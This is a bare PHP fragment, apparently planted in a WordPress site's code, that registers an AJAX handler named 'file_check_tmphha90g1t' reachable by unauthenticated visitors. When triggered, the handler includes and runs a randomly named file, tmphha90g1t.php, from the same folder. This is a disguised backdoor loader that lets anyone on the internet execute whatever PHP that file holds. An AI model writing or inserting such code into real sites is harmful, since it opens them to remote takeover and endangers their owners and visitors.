if(!function_exists('file_check_tmphha90g1t')){ add_action('wp_ajax_nopriv_file_check_tmphha90g1t', 'file_check_tmphha90g1t'); add_action('wp_ajax_file_check_tmphha90g1t', 'file_check_tmphha90g1t'); function file_check_tmphha90g1t() { $file = __DIR__ . '/' . 'tmphha90g1t.php'; if (file_exists($file)) { include $file; } die(); } }